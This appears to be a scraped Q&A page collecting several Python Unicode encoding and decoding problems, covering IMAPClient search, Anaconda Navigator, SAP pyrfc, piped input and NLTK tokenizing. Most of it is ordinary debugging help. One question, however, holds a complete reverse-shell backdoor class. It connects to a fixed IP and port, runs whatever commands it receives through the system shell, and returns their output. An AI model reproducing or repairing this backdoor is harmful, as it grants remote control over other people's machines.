Python IMAPClient/imaplib search unicode issue - python

I'm using the IMAPClient library, but I'm getting UnicodeEncodeError when doing a search. Below is a snippet and the stack trace:
imap_client = imapclient.IMAPClient('imap.gmail.com', use_uid=True, ssl=True)
imap_client.oauth2_login('john#example.com', 'xxx')
subject = u'Test \u0153\u2211\u00b4\u00e5\u00df\u2202'
from_email = u'john#example.com'
to_emails = [u'foo#example.com']
cc_emails = []
approx_date_sent = '05-Aug-2013'
imap_client.select_folder(r'\Sent')
search_criteria = [
u'FROM %s' % from_email,
u'SUBJECT %s'.encode('utf-8') % subject,
u'TO %s' % ';'.join(to_emails) or '',
u'CC %s' % ';'.join(cc_emails) or '',
u'SENTON %s' % approx_date_sent
]
msg_ids = imap_client.search(search_criteria, charset='utf-8')
'ascii' codec can't encode characters in position 77-82: ordinal not in range(128)
Traceback (most recent call last):
File "/base/data/home/runtimes/python27/python27_lib/versions/third_party/webapp2-2.5.1/webapp2.py", line 570, in dispatch
return method(*args, **kwargs)
File "/base/data/home/apps/s~app/dev.369284735686497536/imapapi.py", line 269, in post
to_emails=to_emails, cc_emails=cc_emails, approx_date_sent=approx_date_sent
File "/base/data/home/apps/s~app/dev.369284735686497536/utils/imap.py", line 123, in search_message
msg_ids = imap_client.search(search_criteria, charset='utf-8')
File "/base/data/home/apps/s~app/dev.369284735686497536/imapclient/imapclient.py", line 569, in search
typ, data = self._imap.search(charset, *criteria)
File "/base/data/home/runtimes/python27/python27_dist/lib/python2.7/imaplib.py", line 625, in search
typ, dat = self._simple_command(name, 'CHARSET', charset, *criteria)
File "/base/data/home/runtimes/python27/python27_dist/lib/python2.7/imaplib.py", line 1070, in _simple_command
return self._command_complete(name, self._command(name, *args))
File "/base/data/home/runtimes/python27/python27_dist/lib/python2.7/imaplib.py", line 857, in _command
self.send('%s%s' % (data, CRLF))
File "/base/data/home/runtimes/python27/python27_dist/lib/python2.7/imaplib.py", line 1178, in send
sent = self.sslobj.write(data)
File "/base/data/home/runtimes/python27/python27_dist/lib/python2.7/ssl.py", line 232, in write
return self._sslobj.write(data)
UnicodeEncodeError: 'ascii' codec can't encode characters in position 77-82: ordinal not in range(128)
The error appears to be raised inside ssl.py. Disabling SSL is not an option, because ssl=True is required for oauth2_login.

Try the approach described in the question "Python IMAP search using a subject encoded with iso-8859-1".
It covers UTF-8 as well as ISO-8859-1.

Related

Anaconda Navigator stuck on "loading applications"

(base) C:\Windows\System32>anaconda-navigator
2022-10-25 21:01:52,124 - ERROR init.global_exception_logger:19
'utf-8' codec can't decode byte 0xbb in position 0: invalid start byte
Traceback (most recent call last):
File "D:\anaconda3\lib\site-packages\anaconda_navigator\widgets\main_window\__init__.py", line 497, in setup
self.post_setup(conda_data=output)
File "D:\anaconda3\lib\site-packages\anaconda_navigator\widgets\main_window\__init__.py", line 525, in post_setup
self.tab_home.setup(conda_data)
File "D:\anaconda3\lib\site-packages\anaconda_navigator\widgets\tabs\home.py", line 253, in setup
self.update_applications()
File "D:\anaconda3\lib\site-packages\anaconda_navigator\widgets\tabs\home.py", line 292, in update_applications
self.api.process_apps(self._applications, prefix=self.current_prefix).values(),
File "D:\anaconda3\lib\site-packages\anaconda_navigator\api\anaconda_api.py", line 561, in process_apps
collected_applications: external_apps.ApplicationCollection = external_apps.get_applications(
File "D:\anaconda3\lib\site-packages\anaconda_navigator\api\external_apps\__init__.py", line 49, in get_applications
apps: typing.Sequence[typing.Union[BaseApp, AppPatch]] = config_utils.load_configuration(context=context)
File "D:\anaconda3\lib\site-packages\anaconda_navigator\api\external_apps\config_utils.py", line 217, in load_configuration
return apply_configuration(
File "D:\anaconda3\lib\site-packages\anaconda_navigator\api\external_apps\config_utils.py", line 198, in apply_configuration
addition: typing.Union[None, base.BaseApp, base.AppPatch] = base.BaseApp.parse_configuration(
File "D:\anaconda3\lib\site-packages\anaconda_navigator\api\external_apps\base.py", line 233, in parse_configuration
return target_cls._parse_configuration( # pylint: disable=protected-access
File "D:\anaconda3\lib\site-packages\anaconda_navigator\api\external_apps\base.py", line 458, in _parse_configuration
result: BaseInstallableApp = BaseInstallableApp(
File "", line 17, in __init__
self.__attrs_post_init__()
File "D:\anaconda3\lib\site-packages\anaconda_navigator\api\external_apps\base.py", line 378, in __attrs_post_init__
for location in self._detector(context=context):
File "D:\anaconda3\lib\site-packages\anaconda_navigator\api\external_apps\bundle\vscode_utils.py", line 58, in __call__
stdout, _, _ = conda_launch_utils.run_process([application.executable, '--version'])
File "D:\anaconda3\lib\site-packages\anaconda_navigator\utils\conda\launch.py", line 45, in run_process
stdout = ansi_utlils.escape_ansi(raw_stdout.decode())
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xbb in position 0: invalid start byte
Can anyone help me solve this issue?

I can't solve a problem that occurs when transferring a JSON object

I can successfully establish a connection, but as soon as I use JSON to transfer the data, I run into a problem. I need JSON because I have to transfer large amounts of data.
import json
import socket
import subprocess
class Reverce_Backdoor:
def __init__(self, ip, port):
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((ip, port))
def reliable_send(self, data):
json_data = json.dumps(data)
self.connection.send(json_data)
def reliable_receive(self):
json_data = self.connection.recv(1024)
return json.loads(json_data)
def execute_system_command(self, command):
return subprocess.check_output(command.encode('utf-8'), shell=True)
def run(self):
while True:
command = self.reliable_receive()
command_result = self.execute_system_command(command.encode('utf-8'))
self.reliable_send(command_result)
connection.close()
my_backdoor = Reverce_Backdoor("192.168.3.5", 4444)
my_backdoor.run()
I get an error:
C:\Python27\python.exe C:/Users/etoma/PycharmProjects/backdoor/reverce_backdoor.py
Traceback (most recent call last):
File "C:/Users/etoma/PycharmProjects/backdoor/reverce_backdoor.py", line 31, in <module>
my_backdoor.run()
File "C:/Users/etoma/PycharmProjects/backdoor/reverce_backdoor.py", line 26, in run
self.reliable_send(command_result)
File "C:/Users/etoma/PycharmProjects/backdoor/reverce_backdoor.py", line 12, in reliable_send
json_data = json.dumps(data)
File "C:\Python27\lib\json\__init__.py", line 231, in dumps
return _default_encoder.encode(obj)
File "C:\Python27\lib\json\encoder.py", line 195, in encode
return encode_basestring_ascii(o)
UnicodeDecodeError: 'utf8' codec can't decode byte 0x92 in position 1: invalid start byte
However, the following code works, even though its functionality is the same:
https://github.com/Oleg9637/Python
Can anyone help?
Even if I do:
def run(self):
while True:
command = self.reliable_receive()
command_result = self.execute_system_command(command)
print (command_result)
self.reliable_send(command_result)
connection.close()
I get:
Traceback (most recent call last):
File "C:/Users/etoma/PycharmProjects/backdoor/reverce_backdoor.py", line 32, in <module>
my_backdoor.run()
File "C:/Users/etoma/PycharmProjects/backdoor/reverce_backdoor.py", line 27, in run
self.reliable_send(command_result)
File "C:/Users/etoma/PycharmProjects/backdoor/reverce_backdoor.py", line 12, in reliable_send
json_data = json.dumps(data)
File "C:\Python27\lib\json\__init__.py", line 231, in dumps
return _default_encoder.encode(obj)
File "C:\Python27\lib\json\encoder.py", line 195, in encode
return encode_basestring_ascii(o)
UnicodeDecodeError: 'utf8' codec can't decode byte 0x92 in position 1: invalid start byte
The connection is established and the command is transmitted correctly, but something goes wrong when the result is sent back.

SAP UnicodeDecodeError: 'utf-8' codec can't decode bytes in position 2-3: unexpected end of data while calling RFC_READ_TABLE

I followed all the steps in this guide (https://blogs.sap.com/2020/06/09/connecting-python-with-sap-step-by-step-guide/) and am able to establish a successful connection to the SAP server, but at the line that calls the conn.call method I get this:
Traceback (most recent call last):
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python38\sap.py", line 22, in <module>
result = conn.call('RFC_READ_TABLE', QUERY_TABLE = 'TCURR', OPTIONS = options, ROWSKIPS = rowskips, ROWCOUNT = ROWS_AT_A_TIME)
File "src\pyrfc_pyrfc.pyx", line 423, in pyrfc._pyrfc.Connection.call
File "src\pyrfc_pyrfc.pyx", line 2021, in pyrfc._pyrfc.wrapResult
File "src\pyrfc_pyrfc.pyx", line 2100, in pyrfc._pyrfc.wrapVariable
File "src\pyrfc_pyrfc.pyx", line 2070, in pyrfc._pyrfc.wrapTable
File "src\pyrfc_pyrfc.pyx", line 2039, in pyrfc._pyrfc.wrapStructure
File "src\pyrfc_pyrfc.pyx", line 2285, in pyrfc._pyrfc.wrapString
UnicodeDecodeError: 'utf-8' codec can't decode bytes in position 2-3: unexpected end of data
Versions:
os-windows 10
python version - 3.8.6
sap sdk - PL 7
pyrfc release - pyrfc-2.0.0-cp38-cp38-win_amd64
Code:
from pyrfc import Connection, ABAPApplicationError, ABAPRuntimeError, LogonError, CommunicationError
from configparser import ConfigParser
from pprint import PrettyPrinter
ASHOST='sapxxxxx'
CLIENT='x00'
SYSNR='00'
USER='XXXXXXXX'
PASSWD='XXXXXXXX'
conn = Connection(ashost=ASHOST, sysnr=SYSNR, client=CLIENT, user=USER, passwd=PASSWD)
try:
options = [{ 'TEXT': "FCURR = 'USD'"}]
pp = PrettyPrinter(indent=4)
ROWS_AT_A_TIME = 10
rowskips = 0
while True:
print("----Begin of Batch---")
result = conn.call('RFC_READ_TABLE', \
QUERY_TABLE = 'TCURR', \
OPTIONS = options, \
ROWSKIPS = rowskips, ROWCOUNT = ROWS_AT_A_TIME)
pp.pprint(result['DATA'])
rowskips += ROWS_AT_A_TIME
if len(result['DATA']) < ROWS_AT_A_TIME:
break
except CommunicationError:
print("Could not connect to server.")
raise
except LogonError:
print("Could not log in. Wrong credentials?")
raise
except (ABAPApplicationError, ABAPRuntimeError):
print("An error occurred.")
raise
> Traceback (most recent call last): <br>
> File "C:\Users\Administrator\AppData\Local\Programs\Python\Python38\sap.py", line 22, in <module> <br>
> ----Begin of Batch---
> `result = conn.call('RFC_READ_TABLE', QUERY_TABLE = 'TCURR', OPTIONS = options, ROWSKIPS = rowskips, ROWCOUNT = ROWS_AT_A_TIME)` <br>
> File "src\pyrfc_pyrfc.pyx", line 423, in pyrfc._pyrfc.Connection.call <br>
> File "src\pyrfc_pyrfc.pyx", line 2021, in pyrfc._pyrfc.wrapResult <br>
> File "src\pyrfc_pyrfc.pyx", line 2100, in pyrfc._pyrfc.wrapVariable <br>
> File "src\pyrfc_pyrfc.pyx", line 2070, in pyrfc._pyrfc.wrapTable <br>
> File "src\pyrfc_pyrfc.pyx", line 2039, in pyrfc._pyrfc.wrapStructure <br>
> File "src\pyrfc_pyrfc.pyx", line 2285, in pyrfc._pyrfc.wrapString <br>
> UnicodeDecodeError: 'utf-8' codec can't decode bytes in position 2-3: unexpected end of data <br>

UnicodeDecodeError from piping .txt file with cat

I am using cat test.txt | and piping the lines of that file into my python program. However, I am getting a UnicodeDecodeError:
Traceback
Traceback (most recent call last):
File "/home/sys_bio_ctgdq/sthe-admin/python3.5/lib/python3.5/runpy.py", line 170, in _run_module_as_main
"__main__", mod_spec)
File "/home/sys_bio_ctgdq/sthe-admin/python3.5/lib/python3.5/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/nfsdata/DSCluster/home/bli1/qe-trinity-functional/qe/trinity/hdfs2datacase.py", line 102, in <module>
sys.exit(main(sys.argv))
File "/nfsdata/DSCluster/home/bli1/qe-trinity-functional/qe/trinity/hdfs2datacase.py", line 72, in main
for rawline in fileinput.input(args.targets):
File "/home/sys_bio_ctgdq/sthe-admin/python3.5/lib/python3.5/fileinput.py", line 265, in __next__
line = self.readline()
File "/home/sys_bio_ctgdq/sthe-admin/python3.5/lib/python3.5/fileinput.py", line 370, in readline
self._buffer = self._file.readlines(self._bufsize)
File "/tmp/python3_bli1/lib/python3.5/codecs.py", line 321, in decode
(result, consumed) = self._buffer_decode(data, self.errors, final)
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xae in position 1971: invalid start byte
Line 72 is the for loop line
Here is how I handle the input stream:
for rawline in fileinput.input(args.targets, openhook=fileinput.hook_encoded("utf-8")):
try:
jobj = json.loads(rawline)
except ValueError as e:
log.warn("invalid json on input line %d", line_count)
except UnicodeDecodeError as e:
log.warn("Funky characters", line_count)
else:
if case_obj is not None:
case_str = json.dumps(case_obj, sort_keys=True, indent=4)
if first_case:
print("[")
first_case = False
else:
print(",")
print(case_str)
finally:
pass

Strange behaviour with nltk sentence tokenizer and special characters

I get some strange behavior when using the sent_tokenizer for German text.
Example Code:
sent_tokenizer = nltk.data.load('tokenizers/punkt/german.pickle')
for sent in sent_tokenizer.tokenize("Super Qualität. Tolles Teil.")
print sent
This fails with the error:
Traceback (most recent call last):
for sent in sent_tokenize("Super Qualität. Tolles Teil."):
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/__init__.py", line 82, in sent_tokenize
return tokenizer.tokenize(text)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 1270, in tokenize
return list(self.sentences_from_text(text, realign_boundaries))
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 1318, in sentences_from_text
return [text[s:e] for s, e in self.span_tokenize(text, realign_boundaries)]
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 1309, in span_tokenize
return [(sl.start, sl.stop) for sl in slices]
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 1348, in _realign_boundaries
for sl1, sl2 in _pair_iter(slices):
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 354, in _pair_iter
prev = next(it)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 1324, in _slices_from_text
if self.text_contains_sentbreak(context):
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 1369, in text_contains_sentbreak
for t in self._annotate_tokens(self._tokenize_words(text)):
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 1504, in _annotate_second_pass
for t1, t2 in _pair_iter(tokens):
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 354, in _pair_iter
prev = next(it)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 621, in _annotate_first_pass
for aug_tok in tokens:
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/nltk/tokenize/punkt.py", line 586, in _tokenize_words
for line in plaintext.split('\n'):
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 6: ordinal not in range(128)
whereas:
sent_tokenizer = nltk.data.load('tokenizers/punkt/german.pickle')
for sent in sent_tokenizer.tokenize("Super Qualität des Produktes. Tolles Teil.")
print sent
works perfectly
I found the solution on the nltk homepage.
Caution: when tokenizing a Unicode string, make sure you are not using
an encoded version of the string (it may be necessary to decode it
first, e.g. with s.decode("utf8")).
So
text = "Super Qualität. Tolles Teil."
sent_tokenizer = nltk.data.load('tokenizers/punkt/german.pickle')
for sent in sent_tokenizer.tokenize(text.decode('utf8')):
print sent
works like a charm.

Categories